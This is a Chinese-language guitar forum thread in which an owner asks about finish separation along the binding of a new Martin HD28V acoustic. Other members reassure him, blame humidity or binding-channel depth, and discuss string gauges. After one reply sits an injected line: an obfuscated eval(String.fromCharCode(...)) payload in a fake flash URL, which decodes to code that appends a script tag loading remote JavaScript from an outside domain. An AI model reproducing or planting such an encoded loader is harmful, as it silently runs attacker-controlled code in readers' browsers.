汉口往事 发表于 2017-3-13 18:09:50

MARTIN HD28V 包边漆裂

北方,2017年1月入手2016年产MARTIN HD28V,家里一直24小时使用室内加湿器,室内整体湿度控制在55%左右,琴盒内指针和电子湿度计显示一致,均在55%左右。2月发现包边与侧板交界处表面油漆出现整圈均匀断层漆裂,肉眼直观无明显痕迹,基本无白茬出现,不影响整体外观及正常使用,仅在用手指来回触摸时,有断层、台阶、高低、刮手的感觉。形成原因不明,最直接的原因应该是硝基油漆成膜太薄、包边abs材质与琴体木材对于干湿度和温度的反映程度不同(温度湿度骤变?运输装卸震动?复古系列油漆比标准型号更薄?不知道合适的温度湿度下是否能够还原?)。
      新琴到家之后从来没在出过门,家里湿度一直保持在55%左右。验货时自己也仔细观察过整体外观,无磕碰,无划痕,之前也有过几支全新琴购买经验,国产、进口、电琴、民谣、古典、全合板、面单、全单,但包边处从未出现过类似情况,可能也就没太仔细观察包边漆面,也很有可能是被第一次入手hd28v的兴奋情绪麻痹了,至于是不是入手后形成的,我不纠结,因为没有用。我知道硝基油漆的脆弱特点,但是感觉至少出厂的最后一道整体表面抛光程序后不应该是这种情况。
   之前在论坛里其他贴中讨论过这个问题,类似情况也是有的,也有完美的,也有情况更加严重的,也见过om42包边开胶脱离琴体的,但是应该不能通过别人也有这种类似的情况来寻求安慰吧,毕竟不是三五千的东西,也不是二手的,希望大家能够理解这种心情,本人也确实是个追求完美的外观控,这点必须承认,对于完美外观的追求转移了很多原本应该用来练琴的精力。
   烦请教各位前辈指教:有没有预防此类情况进一步发展以及预防和补救的措施,第一次入手全新Martin,希望各位前辈能够理解,不足之处请多包涵体谅,谢谢!

Guitar-Johnny 发表于 2017-3-13 18:29:16

太多的Martin和Gibson都有这个现象了。原因源自于他的槽开得浅了一些,所以包边稍微突出来了一点点。一般做实木包边的话就不会有这个问题,因为能打磨掉,这种象牙白材质的很多都会有全体或者局部的这样的现象。本身就不是平的,上完漆当然也不会是平的啦。放心吧,漆裂的话不是这个颜色的。

biaozhi829 发表于 2017-3-13 19:06:50

看半天都没发现漆裂,漆裂一般容易出现在琴码周围,因为那里受力会轻微鼓起,一般温差变化大容易引起漆裂,我之前那把00028ec就是因为温差造成琴码四周漆裂

汉口往事 发表于 2017-3-13 19:12:27

Guitar-Johnny 发表于 2017-3-13 18:29
太多的Martin和Gibson都有这个现象了。原因源自于他的槽开得浅了一些,所以包边稍微突出来了一点点。一般做 ...

谢谢,这个情况是侧板比包边突出

汉口往事 发表于 2017-3-13 19:16:04

biaozhi829 发表于 2017-3-13 19:06
看半天都没发现漆裂,漆裂一般容易出现在琴码周围,因为那里受力会轻微鼓起,一般温差变化大容易引起漆裂, ...

嗯,琴桥我也有观察,状态不错,一直用13弦,降半音,标准音都没问题,也许是心理作用放大,,不过的确是锋利刮手的断面,应该有一张两张70克a4纸的厚度,00028ec出掉了?

Guitar-Johnny 发表于 2017-3-13 19:17:52

汉口往事 发表于 2017-3-13 19:12
谢谢,这个情况是侧板比包边突出

嗯,那就是开槽开深了。

汉口往事 发表于 2017-3-13 19:42:01

Guitar-Johnny 发表于 2017-3-13 19:17
嗯,那就是开槽开深了。

啊对,见过一支马丁,包边和侧板也有这种高低不平的台阶,反光和触摸会有感觉,但是还没完全断裂开

tjtdm 发表于 2017-3-13 21:00:16

那就出了吧

汉口往事 发表于 2017-3-13 21:08:38

tjtdm 发表于 2017-3-13 21:00
那就出了吧

发这贴,就是做好了不出的准备了,哈哈

biaozhi829 发表于 2017-3-13 22:06:38

汉口往事 发表于 2017-3-13 19:16
嗯,琴桥我也有观察,状态不错,一直用13弦,降半音,标准音都没问题,也许是心理作用放大,,不过的确是 ...

出掉了,玩弹唱还是需要大琴给力些

汉口往事 发表于 2017-3-13 22:30:11

biaozhi829 发表于 2017-3-13 22:06
出掉了,玩弹唱还是需要大琴给力些

确实是,dreadnought上13琴弦才更铿锵有力,适合弹唱,00028EC也超级喜欢,指板稍宽,琴体相对抱着更灵活,更适合指弹,面板颜色太诱惑了,有机会我也搞一支,祝EC大爷健康长寿

GC木琴客服 发表于 2017-3-14 10:46:44

楼主为了拍的明显点废不少事吧辛苦了,但是仍然没有看出来漆裂 。别强迫症了 真心不叫问题!

汉口往事 发表于 2017-3-14 11:54:58

GC木琴客服 发表于 2017-3-14 10:46
楼主为了拍的明显点废不少事吧辛苦了,但是仍然没有看出来漆裂 。别强迫症了 真心不叫问题! ...

谢谢客服大哥

migooooo 发表于 2017-3-14 22:17:19

你太完美主义了,哈哈!放心的用吧!琴是用来弹的,不是用来抚摸用来看的

汉口往事 发表于 2017-3-14 23:08:43

migooooo 发表于 2017-3-14 22:17
你太完美主义了,哈哈!放心的用吧!琴是用来弹的,不是用来抚摸用来看的 ...

对,我看了一个刘麟老师弹他的d100的视频

jeffrey624 发表于 2017-3-15 14:41:40

我觉得这正常的,由于天气的原因,时间长了,就算你很注意保养,琴边的接缝处还是会出现楼主的这种像裂痕的情况,其实不是裂痕,只是原本边线就是粘合的,而且还有最外面一层漆的覆盖,所以时间长了,经受过干或过湿天气影响每把琴基本都会不同程度出现吧
我用了将近十年的马丁也是一样。但请改心,只要不是主要的面板和背侧板基板裂就不大问题,琴是用来弹的,这么小的细节不必过于担心和在意。

汉口往事 发表于 2017-3-15 16:54:32

jeffrey624 发表于 2017-3-15 14:41
我觉得这正常的,由于天气的原因,时间长了,就算你很注意保养,琴边的接缝处还是会出现楼主的这种像裂痕的 ...

谢谢前辈指点

琴人唯一 发表于 2017-3-15 18:18:16

我的琴不管干湿度若何也没出现过这情况,应该还是做工不严谨

汉口往事 发表于 2017-3-15 20:33:01

琴人唯一 发表于 2017-3-15 18:18
我的琴不管干湿度若何也没出现过这情况,应该还是做工不严谨

几率问题,这就是命

琴人唯一 发表于 2017-3-15 21:33:16

这也就是马丁,要国产的早喷地板上了

汉口往事 发表于 2017-3-16 08:39:55

琴人唯一 发表于 2017-3-15 21:33
这也就是马丁,要国产的早喷地板上了

确实也是你说得这样,比较是少数,而且问题比较轻微,也没有什么解决的办法么不是,而且木头这东西,哎,只能自我安慰了,哈哈

太极哥 发表于 2017-3-16 09:18:02

买之前就这样、湿度变化导致的、没啥事不影响音色

汉口往事 发表于 2017-3-16 12:19:12

太极哥 发表于 2017-3-16 09:18
买之前就这样、湿度变化导致的、没啥事不影响音色

???

jeffrey624 发表于 2017-3-17 10:25:00

汉口往事 发表于 2017-3-15 20:33
几率问题,这就是命

马丁的琴普遍都这样的,绝对不是做工的问题,是气候影响,但这点小问题跟本不是问题啊,再说只是包边,有时候你越是在乎这些小问题会导致你练琴的兴致,每天抱着弹2小时,什么"病"都不会有。

汉口往事 发表于 2017-3-17 13:32:54

jeffrey624 发表于 2017-3-17 10:25
马丁的琴普遍都这样的,绝对不是做工的问题,是气候影响,但这点小问题跟本不是问题啊,再说只是包边,有 ...

恩,一上来难免有这个情绪,谢谢前辈,音色好,练好琴才是最主要的,谢谢

汉口往事 发表于 2017-3-17 13:34:40

jeffrey624 发表于 2017-3-17 10:25
马丁的琴普遍都这样的,绝对不是做工的问题,是气候影响,但这点小问题跟本不是问题啊,再说只是包边,有 ...

我也觉得不应该算是做工问题,一般琴都没这问题

jeffrey624 发表于 2017-3-17 14:08:54

汉口往事 发表于 2017-3-17 13:34
我也觉得不应该算是做工问题,一般琴都没这问题
但就是马丁和吉普森的会比较常见,可能是纯手工制作的缘故吧,其实我有把老雅马哈GC古典包边也有漆裂,还有琴颈与琴身连接处那里也有,总之如不是琴体结构变形,影响使用或音色,这些小问题漆裂、碰损等都可以忽略的,使用难免会有,平时不弹就按你原有的保养就好了

汉口往事 发表于 2017-3-17 14:40:23

jeffrey624 发表于 2017-3-17 14:08
但就是马丁和吉普森的会比较常见,可能是纯手工制作的缘故吧,其实我有把老雅马哈GC古典包边也有漆裂,还 ...

恩,只是爱好者在家里使用。职业乐手还得带着马丁满世界演出去了,应该是没有问题的,谢谢前辈

jeffrey624 发表于 2017-3-17 14:51:12

汉口往事 发表于 2017-3-17 14:40
恩,只是爱好者在家里使用。职业乐手还得带着马丁满世界演出去了,应该是没有问题的,谢谢前辈 ...

客气了,朋友,希望日后看到你更多的使用心得和大家分享

汉口往事 发表于 2017-3-17 15:18:51

jeffrey624 发表于 2017-3-17 14:51
客气了,朋友,希望日后看到你更多的使用心得和大家分享

好的,谢谢前辈,现在基本上平日每天晚上都弹一会,新琴,扫扫弦,分解,从盒子里面掏出来透透气,让他适应环境,开开声。原装013琴弦用了一个月之后。嘀咕拉力大于是换了套012的,用了大概一周又换了套013的,12的弦距会略微降低一点,手感能改善,但是音色果真不如013那么浑厚,现在一直是013降半音,弦距音色手感不错。

jeffrey624 发表于 2017-3-17 15:53:34

汉口往事 发表于 2017-3-17 15:18
好的,谢谢前辈,现在基本上平日每天晚上都弹一会,新琴,扫扫弦,分解,从盒子里面掏出来透透气,让他适 ...

HD28V装013绝对没问题,一方面要看你的指力耐能度,另一方面看练习或弹琴的时间长度,012综合最合适,但013的确音色非常包满更有说服力,都有好处,就看你的实际用途去选择了。再有,013弦张力要比012大很多,如果长时间不弹记得松一半弦再存放。

汉口往事 发表于 2017-3-18 09:28:28

jeffrey624 发表于 2017-3-17 15:53
HD28V装013绝对没问题,一方面要看你的指力耐能度,另一方面看练习或弹琴的时间长度,012综合最合适,但0 ...

好的前辈,多谢指点

醋泡黑豆 发表于 2017-3-18 10:11:25

没事儿的,放心用吧。

汉口往事 发表于 2017-3-18 14:17:23

醋泡黑豆 发表于 2017-3-18 10:11
没事儿的,放心用吧。

嗯,谢谢

再见2014 发表于 2017-3-19 19:32:05

相信大牌 相信大师...

minzhi5255 发表于 2017-3-19 23:06:46

看不下去了就出了,再搞一把

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

汉口往事 发表于 2017-3-19 23:57:13

再见2014 发表于 2017-3-19 19:32
相信大牌 相信大师...

嗯嗯

momo爹 发表于 2017-3-24 15:32:41

没事别松,我不多说

汉口往事 发表于 2017-3-31 00:35:34

momo爹 发表于 2017-3-24 15:32
没事别松,我不多说

学习逃避 发表于 2017-3-31 09:53:12

只能说明做工不到位
页: [1] 2